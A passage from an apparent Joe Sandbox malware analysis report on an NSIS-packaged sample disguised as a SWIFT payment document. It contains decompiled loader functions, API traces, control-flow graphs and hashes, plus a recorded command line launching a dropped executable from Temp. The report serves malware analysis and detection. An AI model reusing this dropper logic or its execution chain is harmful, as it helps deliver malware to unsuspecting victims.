                                                                                  							}
                                                                                  							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                  								_v12 = _v12 + 1;
                                                                                  								_t110 = _t92 - 4;
                                                                                  								if(_t107 > _t110) {
                                                                                  									_t107 = _t110;
                                                                                  								}
                                                                                  								goto L20;
                                                                                  							} else {
                                                                                  								break;
                                                                                  							}
                                                                                  						}
                                                                                  						L20:
                                                                                  						if(_t110 <  *0x420f00) {
                                                                                  							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                                                  						}
                                                                                  						 *0x420ef0 =  *0x420ef0 + _t107;
                                                                                  						_t110 = _t110 - _t107;
                                                                                  					} while (_t110 != 0);
                                                                                  					_t94 = 0;
                                                                                  					goto L24;
                                                                                  				}
                                                                                  			}




























                                                                                  0x004030db
                                                                                  0x004030de
                                                                                  0x004030e1
                                                                                  0x004030fb
                                                                                  0x00403100
                                                                                  0x00403113
                                                                                  0x00403118
                                                                                  0x0040311e
                                                                                  0x00000000
                                                                                  0x00403120
                                                                                  0x00403131
                                                                                  0x00403142
                                                                                  0x00403149
                                                                                  0x00403151
                                                                                  0x00403156
                                                                                  0x00403158
                                                                                  0x00403243
                                                                                  0x00403245
                                                                                  0x00403251
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040325a
                                                                                  0x00403286
                                                                                  0x0040328b
                                                                                  0x00403296
                                                                                  0x00403298
                                                                                  0x004032a9
                                                                                  0x004032c4
                                                                                  0x004032cd
                                                                                  0x004032d2
                                                                                  0x004032f1
                                                                                  0x00403301
                                                                                  0x00403313
                                                                                  0x00403318
                                                                                  0x00403320
                                                                                  0x0040332d
                                                                                  0x00403335
                                                                                  0x0040333a
                                                                                  0x0040333c
                                                                                  0x0040333c
                                                                                  0x00403344
                                                                                  0x00403344
                                                                                  0x00403347
                                                                                  0x00403348
                                                                                  0x00403348
                                                                                  0x0040334b
                                                                                  0x0040334d
                                                                                  0x0040334d
                                                                                  0x00403357
                                                                                  0x00403363
                                                                                  0x00000000
                                                                                  0x00403368
                                                                                  0x00000000
                                                                                  0x00403320
                                                                                  0x00000000
                                                                                  0x004032d4
                                                                                  0x00403262
                                                                                  0x00403274
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040315e
                                                                                  0x00403163
                                                                                  0x00403168
                                                                                  0x0040316c
                                                                                  0x00403173
                                                                                  0x0040317a
                                                                                  0x0040317c
                                                                                  0x0040317c
                                                                                  0x00403187
                                                                                  0x004032e0
                                                                                  0x00403322
                                                                                  0x00000000
                                                                                  0x00403322
                                                                                  0x00403194
                                                                                  0x00403214
                                                                                  0x00403218
                                                                                  0x0040321d
                                                                                  0x00000000
                                                                                  0x00403214
                                                                                  0x0040319d
                                                                                  0x004031a2
                                                                                  0x004031aa
                                                                                  0x004031d0
                                                                                  0x004031df
                                                                                  0x004031e5
                                                                                  0x004031ea
                                                                                  0x004031f0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004031fa
                                                                                  0x00403202
                                                                                  0x00403205
                                                                                  0x0040320a
                                                                                  0x0040320c
                                                                                  0x0040320c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004031fa
                                                                                  0x0040321e
                                                                                  0x00403224
                                                                                  0x00403230
                                                                                  0x00403230
                                                                                  0x00403233
                                                                                  0x00403239
                                                                                  0x00403239
                                                                                  0x00403241
                                                                                  0x00000000
                                                                                  0x00403241

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004030E4
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,00000400), ref: 00403100
                                                                                    • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 0040615C
                                                                                    • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 00403149
                                                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                  • API String ID: 2803837635-3494802034
                                                                                  • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                  • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                  • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                  • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                                                  C-Code - Quality: 77%
                                                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                  				void* __esi;
                                                                                  				void* _t35;
                                                                                  				void* _t43;
                                                                                  				void* _t45;
                                                                                  				FILETIME* _t51;
                                                                                  				FILETIME* _t64;
                                                                                  				void* _t66;
                                                                                  				signed int _t72;
                                                                                  				FILETIME* _t73;
                                                                                  				FILETIME* _t77;
                                                                                  				signed int _t79;
                                                                                  				WCHAR* _t81;
                                                                                  				void* _t83;
                                                                                  				void* _t84;
                                                                                  				void* _t86;
                                                                                  
                                                                                  				_t77 = __ebx;
                                                                                  				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                  				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                  				_t35 = E00405FAE( *(_t86 - 8));
                                                                                  				_push( *(_t86 - 8));
                                                                                  				_t81 = L"\"C:\\";
                                                                                  				if(_t35 == 0) {
                                                                                  					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                                                                                  				} else {
                                                                                  					E00406668();
                                                                                  				}
                                                                                  				E004068EF(_t81);
                                                                                  				while(1) {
                                                                                  					__eflags =  *(_t86 + 8) - 3;
                                                                                  					if( *(_t86 + 8) >= 3) {
                                                                                  						_t66 = E0040699E(_t81);
                                                                                  						_t79 = 0;
                                                                                  						__eflags = _t66 - _t77;
                                                                                  						if(_t66 != _t77) {
                                                                                  							_t73 = _t66 + 0x14;
                                                                                  							__eflags = _t73;
                                                                                  							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                  						}
                                                                                  						asm("sbb eax, eax");
                                                                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                  						__eflags = _t72;
                                                                                  						 *(_t86 + 8) = _t72;
                                                                                  					}
                                                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                                                  					if( *(_t86 + 8) == _t77) {
                                                                                  						E00406133(_t81);
                                                                                  					}
                                                                                  					__eflags =  *(_t86 + 8) - 1;
                                                                                  					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                  					__eflags = _t43 - 0xffffffff;
                                                                                  					 *(_t86 - 0x38) = _t43;
                                                                                  					if(_t43 != 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                                                  					if( *(_t86 + 8) != _t77) {
                                                                                  						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                                                  						__eflags =  *(_t86 + 8) - 2;
                                                                                  						if(__eflags == 0) {
                                                                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                  						}
                                                                                  						L31:
                                                                                  						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                                  						__eflags =  *0x42a2e8;
                                                                                  						goto L32;
                                                                                  					} else {
                                                                                  						E00406668(0x40b5f8, _t83);
                                                                                  						E00406668(_t83, _t81);
                                                                                  						E004066A5(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                  						E00406668(_t83, 0x40b5f8);
                                                                                  						_t64 = E00405CC8("C:\Users\engineer\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                                                  						__eflags = _t64;
                                                                                  						if(_t64 == 0) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							__eflags = _t64 == 1;
                                                                                  							if(_t64 == 1) {
                                                                                  								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                                  								L32:
                                                                                  								_t51 = 0;
                                                                                  								__eflags = 0;
                                                                                  							} else {
                                                                                  								_push(_t81);
                                                                                  								_push(0xfffffffa);
                                                                                  								E004056CA();
                                                                                  								L29:
                                                                                  								_t51 = 0x7fffffff;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					L33:
                                                                                  					return _t51;
                                                                                  				}
                                                                                  				E004056CA(0xffffffea,  *(_t86 - 8));
                                                                                  				 *0x42a314 =  *0x42a314 + 1;
                                                                                  				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                  				 *0x42a314 =  *0x42a314 - 1;
                                                                                  				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                  				_t84 = _t45;
                                                                                  				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                  					L22:
                                                                                  					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                  				} else {
                                                                                  					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                  					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                                                  				__eflags = _t84 - _t77;
                                                                                  				if(_t84 >= _t77) {
                                                                                  					goto L31;
                                                                                  				} else {
                                                                                  					__eflags = _t84 - 0xfffffffe;
                                                                                  					if(_t84 != 0xfffffffe) {
                                                                                  						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                  					} else {
                                                                                  						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                  						lstrcatW(_t81,  *(_t86 - 8));
                                                                                  					}
                                                                                  					_push(0x200010);
                                                                                  					_push(_t81);
                                                                                  					E00405CC8();
                                                                                  					goto L29;
                                                                                  				}
                                                                                  				goto L33;
                                                                                  			}


















                                                                                  0x0040176f
                                                                                  0x00401776
                                                                                  0x00401782
                                                                                  0x00401785
                                                                                  0x0040178a
                                                                                  0x0040178d
                                                                                  0x00401794
                                                                                  0x004017b0
                                                                                  0x00401796
                                                                                  0x00401797
                                                                                  0x00401797
                                                                                  0x004017b6
                                                                                  0x004017bb
                                                                                  0x004017bb
                                                                                  0x004017bf
                                                                                  0x004017c2
                                                                                  0x004017c7
                                                                                  0x004017c9
                                                                                  0x004017cb
                                                                                  0x004017d0
                                                                                  0x004017d0
                                                                                  0x004017db
                                                                                  0x004017db
                                                                                  0x004017ec
                                                                                  0x004017ee
                                                                                  0x004017ee
                                                                                  0x004017ef
                                                                                  0x004017ef
                                                                                  0x004017f2
                                                                                  0x004017f5
                                                                                  0x004017f8
                                                                                  0x004017f8
                                                                                  0x004017ff
                                                                                  0x0040180e
                                                                                  0x00401813
                                                                                  0x00401816
                                                                                  0x00401819
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040181b
                                                                                  0x0040181e
                                                                                  0x00401874
                                                                                  0x00401879
                                                                                  0x004015b6
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00402c2a
                                                                                  0x00402c2d
                                                                                  0x00402c2d
                                                                                  0x00000000
                                                                                  0x00401820
                                                                                  0x00401826
                                                                                  0x0040182d
                                                                                  0x0040183a
                                                                                  0x00401845
                                                                                  0x0040185b
                                                                                  0x0040185b
                                                                                  0x0040185e
                                                                                  0x00000000
                                                                                  0x00401864
                                                                                  0x00401864
                                                                                  0x00401865
                                                                                  0x00401882
                                                                                  0x00402c33
                                                                                  0x00402c33
                                                                                  0x00402c33
                                                                                  0x00401867
                                                                                  0x00401867
                                                                                  0x00401868
                                                                                  0x00401493
                                                                                  0x0040239d
                                                                                  0x0040239d
                                                                                  0x0040239d
                                                                                  0x00401865
                                                                                  0x0040185e
                                                                                  0x00402c35
                                                                                  0x00402c39
                                                                                  0x00402c39
                                                                                  0x00401892
                                                                                  0x00401897
                                                                                  0x004018a5
                                                                                  0x004018aa
                                                                                  0x004018b0
                                                                                  0x004018b4
                                                                                  0x004018b6
                                                                                  0x004018be
                                                                                  0x004018ca
                                                                                  0x004018b8
                                                                                  0x004018b8
                                                                                  0x004018bc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004018bc
                                                                                  0x004018d3
                                                                                  0x004018d9
                                                                                  0x004018db
                                                                                  0x00000000
                                                                                  0x004018e1
                                                                                  0x004018e1
                                                                                  0x004018e4
                                                                                  0x004018fc
                                                                                  0x004018e6
                                                                                  0x004018e9
                                                                                  0x004018f2
                                                                                  0x004018f2
                                                                                  0x00401901
                                                                                  0x00401906
                                                                                  0x00402398
                                                                                  0x00000000
                                                                                  0x00402398
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00000000,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                    • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                  • String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                                                  • API String ID: 1941528284-3064143381
                                                                                  • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                  • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                  • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                  • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                                                  C-Code - Quality: 100%
                                                                                  			E004069C5(intOrPtr _a4) {
                                                                                  				short _v576;
                                                                                  				signed int _t13;
                                                                                  				struct HINSTANCE__* _t17;
                                                                                  				signed int _t19;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                  				if(_t13 > 0x104) {
                                                                                  					_t13 = 0;
                                                                                  				}
                                                                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                  					_t19 = 1;
                                                                                  				} else {
                                                                                  					_t19 = 0;
                                                                                  				}
                                                                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                  				return _t17;
                                                                                  			}








                                                                                  0x004069dc
                                                                                  0x004069e5
                                                                                  0x004069e7
                                                                                  0x004069e7
                                                                                  0x004069eb
                                                                                  0x004069fe
                                                                                  0x004069f8
                                                                                  0x004069f8
                                                                                  0x004069f8
                                                                                  0x00406a17
                                                                                  0x00406a2b
                                                                                  0x00406a32

                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                  • wsprintfW.USER32 ref: 00406A17
                                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                  • API String ID: 2200240437-1946221925
                                                                                  • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                  • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                  • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                  • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 532 406bb0-406bd3 533 406bd5-406bd8 532->533 534 406bdd-406be0 532->534 535 4075fd-407601 533->535 536 406be3-406bec 534->536 537 406bf2 536->537 538 4075fa 536->538 539 406bf9-406bfd 537->539 540 406d39-4073e0 537->540 541 406c9e-406ca2 537->541 542 406d0e-406d12 537->542 538->535 543 406c03-406c10 539->543 544 4075e5-4075f8 539->544 550 4073e2-4073f8 540->550 551 4073fa-407410 540->551 548 406ca8-406cc1 541->548 549 40754e-407558 541->549 545 406d18-406d2c 542->545 546 40755d-407567 542->546 543->538 552 406c16-406c5c 543->552 544->535 553 406d2f-406d37 545->553 546->544 554 406cc4-406cc8 548->554 549->544 555 407413-40741a 550->555 551->555 556 406c84-406c86 552->556 557 406c5e-406c62 552->557 553->540 553->542 554->541 558 406cca-406cd0 554->558 561 407441-40744d 555->561 562 40741c-407420 555->562 565 406c94-406c9c 556->565 566 406c88-406c92 556->566 563 406c64-406c67 GlobalFree 557->563 564 406c6d-406c7b GlobalAlloc 557->564 559 406cd2-406cd9 558->559 560 406cfa-406d0c 558->560 567 406ce4-406cf4 GlobalAlloc 559->567 568 406cdb-406cde GlobalFree 559->568 560->553 561->536 569 407426-40743e 562->569 570 4075cf-4075d9 562->570 563->564 564->538 572 406c81 564->572 565->554 566->565 566->566 567->538 567->560 568->567 569->561 570->544 572->556
                                                                                  C-Code - Quality: 98%
                                                                                  			E00406BB0(void* __ecx) {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				signed int _v16;
                                                                                  				unsigned int _v20;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _v32;
                                                                                  				signed int _v36;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				signed int _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				signed int _v60;
                                                                                  				signed int _v64;
                                                                                  				signed int _v68;
                                                                                  				signed int _v72;
                                                                                  				signed int _v76;
                                                                                  				signed int _v80;
                                                                                  				signed int _v84;
                                                                                  				signed int _v88;
                                                                                  				signed int _v92;
                                                                                  				signed int _v95;
                                                                                  				signed int _v96;
                                                                                  				signed int _v100;
                                                                                  				signed int _v104;
                                                                                  				signed int _v108;
                                                                                  				signed int _v112;
                                                                                  				signed int _v116;
                                                                                  				signed int _v120;
                                                                                  				intOrPtr _v124;
                                                                                  				signed int _v128;
                                                                                  				signed int _v132;
                                                                                  				signed int _v136;
                                                                                  				void _v140;
                                                                                  				void* _v148;
                                                                                  				signed int _t537;
                                                                                  				signed int _t538;
                                                                                  				signed int _t572;
                                                                                  
                                                                                  				_t572 = 0x22;
                                                                                  				_v148 = __ecx;
                                                                                  				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                  				if(_v52 == 0xffffffff) {
                                                                                  					return 1;
                                                                                  				}
                                                                                  				while(1) {
                                                                                  					L3:
                                                                                  					_t537 = _v140;
                                                                                  					if(_t537 > 0x1c) {
                                                                                  						break;
                                                                                  					}
                                                                                  					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                                                  						case 0:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v116 = _v116 + 1;
                                                                                  							_t537 =  *_v116;
                                                                                  							__eflags = _t537 - 0xe1;
                                                                                  							if(_t537 > 0xe1) {
                                                                                  								goto L174;
                                                                                  							}
                                                                                  							_t542 = _t537 & 0x000000ff;
                                                                                  							_push(0x2d);
                                                                                  							asm("cdq");
                                                                                  							_pop(_t576);
                                                                                  							_push(9);
                                                                                  							_pop(_t577);
                                                                                  							_t622 = _t542 / _t576;
                                                                                  							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                  							asm("cdq");
                                                                                  							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                  							_v64 = _t617;
                                                                                  							_v32 = (1 << _t622) - 1;
                                                                                  							_v28 = (1 << _t544 / _t577) - 1;
                                                                                  							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                  							__eflags = 0x600 - _v124;
                                                                                  							if(0x600 == _v124) {
                                                                                  								L12:
                                                                                  								__eflags = _t625;
                                                                                  								if(_t625 == 0) {
                                                                                  									L14:
                                                                                  									_v76 = _v76 & 0x00000000;
                                                                                  									_v68 = _v68 & 0x00000000;
                                                                                  									goto L17;
                                                                                  								} else {
                                                                                  									goto L13;
                                                                                  								}
                                                                                  								do {
                                                                                  									L13:
                                                                                  									_t625 = _t625 - 1;
                                                                                  									__eflags = _t625;
                                                                                  									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                  								} while (_t625 != 0);
                                                                                  								goto L14;
                                                                                  							}
                                                                                  							__eflags = _v8;
                                                                                  							if(_v8 != 0) {
                                                                                  								GlobalFree(_v8);
                                                                                  							}
                                                                                  							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  							__eflags = _t537;
                                                                                  							_v8 = _t537;
                                                                                  							if(_t537 == 0) {
                                                                                  								goto L174;
                                                                                  							} else {
                                                                                  								_v124 = 0x600;
                                                                                  								goto L12;
                                                                                  							}
                                                                                  						case 1:
                                                                                  							L15:
                                                                                  							__eflags = _v112;
                                                                                  							if(_v112 == 0) {
                                                                                  								_v140 = 1;
                                                                                  								goto L173;
                                                                                  							}
                                                                                  							_v112 = _v112 - 1;
                                                                                  							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                  							_v116 = _v116 + 1;
                                                                                  							_t50 =  &_v76;
                                                                                  							 *_t50 = _v76 + 1;
                                                                                  							__eflags =  *_t50;
